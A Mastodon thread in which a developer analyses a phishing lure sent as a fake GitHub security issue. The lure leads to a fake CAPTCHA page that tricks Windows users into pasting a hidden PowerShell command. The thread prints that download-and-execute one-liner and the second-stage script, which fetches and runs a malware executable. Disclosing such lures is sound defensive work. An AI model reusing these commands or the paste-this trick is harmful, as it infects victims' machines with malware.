Login
You're viewing the mstdn.games public feed.
  • Aaron Toponce ⚛️:debian:atoponce@fosstodon.org
    Sep 18, 2024, 10:11 PM

    I just got an email from GitHub about a new issue for my password generator.

    "Hey there!

    We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue.

    Best regards,
    Github Security Team"

    Uh huh. A security vulnerability for a password generator. Maybe, but I'm skeptical.

    However, the issue no longer exists. Looks like GitHub took it down as spam.

    I'm curious about that URL though.

    1/n

    💬 2🔄 4⭐ 0

Replies

  • Aaron Toponce ⚛️:debian:atoponce@fosstodon.org
    Sep 18, 2024, 10:13 PM

    Visiting github-scanner[.]com I need to verify that I'm human. Okay. sure. It then requests I do the following:

    1. Press Windows Button + R.
    2. Press CTRL + V
    3. Press Enter

    In other words, pull up a shell and paste whatever is in my clipboard.

    What's in the clipboard you ask?

    powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752"

    "download.txt". Yeah, I'm suuuuure that's a text file.

    2/n

    Image attached toot
    💬 2🔄 0⭐ 0
  • Aaron Toponce ⚛️:debian:atoponce@fosstodon.org
    Sep 18, 2024, 10:19 PM

    So, grabbing https://github-scanner[.]com/download.txt and pulling it up in a text editor reveals the following:

    $webClient = New-Object System.Net.WebClient
    $url1 = "https://github-scanner[.]com/l6E.exe"
    $filePath1 = "$env:TEMP\SysSetup.exe"
    $webClient.DownloadFile($url1, $filePath1)
    Start-Process -FilePath $env:TEMP\SysSetup.exe

    "l6E.exe". Any bets on whether or not that's malware?

    Sure enough, it's a positive match with VirusTotal.

    virustotal.com/gui/file/d73763

    3/3

    💬 2🔄 0⭐ 0
  • 💬 0🔄 0⭐ 0